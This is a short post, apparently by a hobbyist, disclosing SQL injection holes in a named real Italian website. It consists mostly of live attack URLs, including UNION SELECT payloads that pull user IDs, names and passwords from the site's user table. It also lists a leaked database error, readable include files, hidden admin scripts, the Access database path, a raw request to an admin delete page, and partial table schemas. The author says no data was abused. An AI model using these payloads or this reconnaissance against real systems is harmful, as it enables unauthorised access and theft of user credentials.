Skip to main content

antiproibizionisti.it | Sql injections, data leak, system compromise

Since the website has been closed (I'm sorry for that).


Some (old) informations.


***Remember that I've never abused of any website or modified anything or used confidential data.***


http://www.antiproibizionisti.it/ricerca.asp?page=1&trova=(%20Advid%20)';%20trunca

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query



/inc_ricerca.htm, line 12



--------------
http://antiproibizionisti.it/archivio_sdf.asp?f=1'0

http://antiproibizionisti.it/display_gessa.asp?f=3629&u='9
http://antiproibizionisti.it/archivio_gessa.asp?f='9

http://antiproibizionisti.it/display.asp?f=4177&u=10

http://antiproibizionisti.it/archivio_sdf.asp?f=10%20union%20select%20sum(nome),1,2,3,6,4,4,5%20from%20user
http://antiproibizionisti.it/archivio_sdf.asp?f=10%20UNION%20SELECT%20id,%20name,%20'','','','','',''%20FROM%20user


http://antiproibizionisti.it/archivio_sdf.asp?f=10%20union%20select%201,1,1,1%20from%20user%20where%20%20id=1




http://antiproibizionisti.it/display.asp?f=4177&u=1%20union%20select%20id,nome,cognome,pass,1,1,1,1%20from%20user
http://antiproibizionisti.it/display_sdf.asp?f=4840&u=10



ID
IDutente

-----
File leggibili
/inc_archiviofilo_sdf.htm
/inc_ricerca.htm

existing files that are not available from the web
modifica.asp
pass.asp
mail.asp
news.asp
delnews.asp
editnews.asp


database
mdb-database/notizie.mdb


GET /admin/delnews.asp HTTP/1.1
Host: antiproibizionisti.it


-----------------------------------------------------


parts of the DB SCHEMA


-news
->titolo
->testo
->titoletto
->data

-user  --- 8 columns
->ID
->nome
->cognome
->pass


-filodiretto
->IDutente
->risposta
->data_dom

Comments